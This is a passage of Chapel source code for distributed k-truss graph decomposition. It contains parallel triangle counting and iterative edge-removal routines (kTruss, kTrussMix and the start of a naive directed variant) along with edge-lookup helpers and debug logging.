tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
SetNextF.add((i,tmpe));
SetNextF.add((i,j));
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
SetNextF.add((i,j));
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
SetNextF.add((i,tmpe));
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1==-1) {
//writeln("Error! Cannot find the edge ",j,"=(",v4,",",v3,")");
} else {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
SetNextF.add((i,tmpe));
SetNextF.add((i,e1));
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
SetNextF.add((i,e1));
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
rset.add((i,j));// just want (i,j) is unique in rset
}
}// end of forall
for (i,j) in rset {
if (EdgeDeleted[j]==-1) {
TriCount[j]-=1;
if (TriCount[j]<k-2) {
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
RemovedEdge+=SetCurF.getSize();
tmpN2+=1;
SetNextF.clear();
}// end of while
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
//writeln("remove the ",tmpi, " edge ",i);
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive Min Search,Given K="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Min Search,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Min Search,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Min Search,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
}// end of proc KTruss Naive Min Search
//For undirected graph, we use triangle search method. This should be our typical method.
//The performance should be good.
proc kTruss(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//First off, we remove the duplicated and cycle edges. This is common for all methods.
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
{
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u;
lV=v;
ldV=dv;
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
forall x in dst[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
forall s in sVadj with ( + reduce Count) {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<=ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i].write(Count);
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
// here we mark the edges whose number of triangles is less than k-2 as 1-k
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<=dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each locale only check its owned edges
if (EdgeDeleted[j]==-1) {
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
RemovedEdge+=SetCurF.getSize();
tmpN2+=1;
SetNextF.clear();
}// end of while
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss,Given K="+k:string +" All Removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTruss
//For undirected graph, mix the two data structure methods to search triangles.
//This should be the best one.
proc kTrussMix(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we first remove the duplicated and cycle edges
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
//writeln("For k=",k," We have removed the edge ",i, "=<",v1,",",v2,">");
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
//we will try to remove all the unnecessary edges in the graph
//while (ConFlag) {
//we should not need the loop for non-naive version
{
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
// wedge case i<e, u->v, u->x
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=exactEdge(v,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
var e3=exactEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (i<e3)) {
// cycle case i<e,i<e3, u->v->x->u
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
} else {
if (dv2>0) {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTrussMix,Given K="+k:string +" All Removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTrussMix,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTrussMix,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTrussMix,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussMix
//For directed graph, using the naive method. The performance should be bad.
proc kTrussNaiveDirected(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
